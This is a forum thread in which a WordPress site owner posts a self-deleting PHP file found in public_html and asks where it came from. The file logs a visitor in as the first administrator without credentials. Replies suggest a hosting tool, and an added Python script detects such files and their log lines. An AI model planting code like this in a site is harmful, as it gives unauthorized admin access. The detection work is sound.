I found this in my public_html folder. All scans seem to think it is OK. How in the world did it end up there?

```php
<?php
//
// Automatically login a single WordPress user upon arrival to main page.
//
function auto_login() {
    if (!is_user_logged_in()) {
        // Admin user_id
        $admins = get_users(array('role'=>'administrator'));
        $user_id = $admins[0]->ID;
        $user = get_user_by( 'ID', $user_id );
        if ( !$user ) {
            error_log("wp_auto_login: user_id==1 not found redirecting to admin_url");
            $redirect_page = admin_url();
            wp_redirect( $redirect_page );
            exit();
        }
        $loginusername = $user->user_login;
        wp_set_current_user($user_id, $loginusername);
        wp_set_auth_cookie($user_id);
        // Go to admin area
        $redirect_page = admin_url();
        error_log("wp_auto_login: trying to login user_id==1 loginusername=$loginusername to admin_url=$redirect_page");
        wp_redirect( $redirect_page );
        exit();
    }
}

// Initialize wordpress
define( 'WP_USE_THEMES', true );

$time_since_script_creation = time() - stat(__FILE__)['mtime'];

// Delete itself to make sure it is executed only once
unlink(__FILE__);

if ( ! isset( $wp_did_header ) ) {
    $wp_did_header = true;

    // Load the WordPress library.
    require_once( dirname( __FILE__ ) . '/wp-load.php' );

    // If the user is already logged in just redirect it to admin area
    if ( is_user_logged_in() ) {
        $redirect_page = admin_url();
        wp_redirect( $redirect_page );
        exit();
    }

    // Avalon auto-login
    // If script is older than 30 minutes, doesn't log in as admin
    if ($time_since_script_creation < 30 + 60) {
        auto_login();
    }

    // Set up the WordPress query
    wp();

    // Load the theme template
    require_once( ABSPATH . WPINC . '/template-loader.php' );
}
```
Probably placed there by your current or a previous hosting company to allow you to log in without username/password. Personally, I wouldn't like that being there.
Confirm with your hosting provider.
> Avalon auto-login

Do you know who Avalon is? That's where I'd start.
Looks similar to this one. https://wordpress.org/support/topic/file-appears-to-be-malicious-or-unsafe-wp_auto_login_e7eb5fc1533296eec7c9ef1cc7/
Might be the hosting provider. Delete it and see if it comes back after going through their admin to get into WordPress.
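
An added example, not part of the thread or of any poster's code: a Python check that looks for other files combining the two calls the posted script uses (`wp-load.php` plus `wp_set_auth_cookie()`) and for the `error_log()` line it writes, since the script deletes itself after one run. The sample file name, directory layout and log lines are constructed assumptions; a plugin with its own login flow can also match, so hits are files to review.

```python
import re
import tempfile
from pathlib import Path

# The combination the posted script uses: bootstrap WordPress, then mint an auth cookie.
BOOTSTRAP = re.compile(r"require(?:_once)?\b[^;]*wp-load\.php")
AUTH_COOKIE = re.compile(r"\bwp_set_auth_cookie\s*\(")
# Message the posted script passes to error_log() just before redirecting.
LOG_MARK = re.compile(r"wp_auto_login: trying to login user_id==1 loginusername=(\S+)")
CORE_DIRS = {"wp-admin", "wp-includes"}  # WordPress core directories, skipped


def find_auto_login_scripts(docroot):
    """PHP files outside core dirs that load wp-load.php and call wp_set_auth_cookie()."""
    hits = []
    for path in sorted(Path(docroot).rglob("*.php")):
        rel = path.relative_to(docroot)
        if rel.parts[0] in CORE_DIRS:
            continue
        text = path.read_text(errors="replace")
        if BOOTSTRAP.search(text) and AUTH_COOKIE.search(text):
            hits.append(rel.as_posix())
    return hits


def logins_from_error_log(lines):
    """Usernames the script reported logging in; the file is gone by then, the log is not."""
    return [m.group(1) for m in map(LOG_MARK.search, lines) if m]


def demo():
    """Run both checks on constructed sample data (file names and log lines are made up)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-includes").mkdir()
        (root / "wp-includes/pluggable.php").write_text("<?php function wp_set_auth_cookie( $id ) {}")
        (root / "index.php").write_text("<?php require __DIR__ . '/wp-load.php';")
        (root / "wp_auto_login_EXAMPLE.php").write_text(
            "<?php require_once( dirname( __FILE__ ) . '/wp-load.php' ); wp_set_auth_cookie($user_id);")
        files = find_auto_login_scripts(root)
    log = [
        "[01-Jan-2024 10:00:00 UTC] PHP Warning: constructed unrelated line",
        "[01-Jan-2024 10:00:05 UTC] wp_auto_login: trying to login user_id==1 "
        "loginusername=siteadmin to admin_url=https://example.test/wp-admin/",
    ]
    return files, logins_from_error_log(log)


if __name__ == "__main__":
    print(demo())
```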